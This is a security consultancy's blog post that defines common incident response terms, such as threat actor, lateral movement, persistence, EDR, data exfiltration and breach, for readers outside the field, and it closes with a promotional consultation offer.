top of page
  • Drew Hjelm

What’s the Word? Common Incident Response Lingo to Know

Folks who work in the technology and cybersecurity industry often use specialized language and lingo to talk about their jobs. For those with untrained ears, the jargon can often be confusing. Sometimes it’s really hard to slip out of computer speak and back into language other folks can understand, but in the event you hear a cybersecurity pro use some of these terms I hope you can use this as a reference to better understand what they’re saying.

Malware – computer software designed and used with malicious intent. Malware can take many forms and be deployed in many ways.

Potentially unwanted programs (PUPs) – sometimes called grayware, these software programs are sometimes used maliciously but can also be used in support of legitimate purposes. These could include:

  • Adware - software with ads. The software and/or ads can often redirect or intercept legitimate traffic.

  • Remote access tools (RAT) – tools provide a way for someone to control a system remotely. These can be legitimate tools like those used by system administrators and managed service providers (MSP) to update or troubleshoot software. They may also be tools used for malign purposes. Or they may be legitimate tools installed by threat actors like TeamViewer or AnyDesk.

  • Offensive security tools (OST) – software designed by security researchers which can be used by legitimate firms to conduct security exercises like penetration tests. These tools can also be used by threat actors to exploit systems for further deployment of malware like ransomware. Cobalt Strike is an example of a popular OST.

Threat actor – a person or group intentionally attempting to exploit a victim for a purpose like stealing data or deploying ransomware. Sometimes a threat actor could be an inside threat, but most often it is an external party like a criminal gang. Threat actor is a typical term used by incident responders to describe the main adversary during an intrusion. During some investigations, there may even be more than one threat actor involved. The usage of the term varies, but many incident responders will avoid using terms like “attacker,” “bad guy,” or “hacker” in official communications and instead use threat actor.

Ransomware – malware designed to encrypt or otherwise disrupt access to systems and data in exchange for money. Ransomware comes in many forms and has been around since the 1980s but has only become a major nuisance in the past decade due to the rise of criminal groups using cryptocurrencies.

Antivirus (AV) – a protection tool designed to stop malware and PUPs. Some of these are free whereas others can be paid and centrally managed. Typically, AV software looks at characteristics of software, rather than being able to analyze how the software behaves. Traditional AV can miss some newer forms of malware.

Endpoint Detection and Response (EDR) – this is a protection tool that not just looks at signatures of malware like traditional AV but can also analyze how the software behaves. EDR tools often allow defenders to hunt for signs of threat actor activity in logs and other sources that aren’t available in traditional AV.

Root point of compromise (RPOC) – sometimes called the Initial Access, this is how the threat actors get a foothold in a victim’s systems. Sometimes this may be through an email campaign (phishing), while often it could also be through exploiting weak usernames and passwords (credentials) or vulnerable external systems.

Lateral movement – sometimes called pivoting, “moving laterally” is when a threat actor accesses a second, third, or even tenth system from a system they’ve already gained access. It’s like a game of leapfrog or a military campaign of “island hopping” from beach head to beach head.

Persistence – after a threat actor exploits a victim and gains access to their systems, they will attempt to create/modify accounts or use a tool like a RAT or OST to ensure they can keep a foothold in the victim’s systems so they can continue toward their goals (data theft/exfiltration, ransomware, etc).

Data exfiltration – when a threat actor is able to steal data in any quantity, the data is said to be exfiltrated. Threat actors may simply copy and paste data through a remote window or they may use tools like Mega, Rclone, or SSH to exfiltrate large quantities of data.

Breach – in incident response, breach is typically a term that indicates sensitive data has been accessed or stolen, typically by a malicious threat actor but can also be an unintentional act. During an incident, your privacy counsel and/or incident response team will remind you not to use the word ‘breach’ as it often has specific legal ramifications in terms of having to notify regulators, business partners, employees, and/or customers. In other words, don’t use the word ‘breach’ unless you have confirmed data is compromised or stolen.

The most important thing isn’t to just know the lingo, it’s to be prepared for how to handle an incident. Helm Information Security can help you navigate the cybersecurity challenges you face before an incident happens. Contact us today to set up a consultation.


bottom of page